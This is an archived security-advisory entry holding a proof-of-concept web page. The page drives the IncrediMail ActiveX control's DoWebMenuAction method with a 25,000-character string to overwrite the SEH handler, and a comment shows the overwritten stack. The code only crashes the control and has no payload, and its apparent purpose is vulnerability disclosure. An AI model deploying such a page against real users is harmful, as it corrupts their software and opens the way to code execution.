Incredimail Active-X Memory Corruption

2010-05-15T00:00:00
ID PACKETSTORM:89564
Type packetstorm
Reporter Lincoln
Modified 2010-05-15T00:00:00

Description

                                        
                                            `<html>  
<!--  
|------------------------------------------------------------------|  
| __ __ |  
| _________ ________ / /___ _____ / /____ ____ _____ ___ |  
| / ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ |  
| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |  
| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ |  
| |  
| http://www.corelan.be:8800 |  
| security@corelan.be |  
| |  
|-------------------------------------------------[ EIP Hunters ]--|  
  
# Software : Incredimail (ImShExtU.dll)  
# Reference : http://www.corelan.be:8800/advisories.php?id=CORELAN-10-038  
# Author : Lincoln  
# OS : Windows  
# Tested on : XP SP3 En (VirtualBox)  
# Type of vuln : SEH  
# Greetz to : Corelan Security Team   
# http://www.corelan.be:8800/index.php/security/corelan-team-members/  
#  
# Script provided 'as is', without any warranty.  
# Use for educational purposes only.  
# Do not use this code to do anything illegal !  
#  
# Note : you are not allowed to edit/modify this code.  
# If you do, Corelan cannot be held responsible for any damages this may cause.  
#  
#0013F1A4 41414141 AAAA  
#0013F1A8 41414141 AAAA  
#0013F1AC 41414141 AAAA Pointer to next SEH record  
#0013F1B0 41414141 AAAA SE handler  
#0013F1B4 41414141 AAAA  
#0013F1B8 41414141 AAAA  
#  
-->  
  
<object classid='clsid:F8984111-38B6-11D5-8725-0050DA2761C4' id='target' ></object>  
<script language='vbscript'>  
  
  
crash=String(25000, "A")  
target.DoWebMenuAction crash  
  
  
</script>  
<b><center>IncrediMail ImShExtU.dll ActiveX Memory Corruption</b></center>  
</html>  
`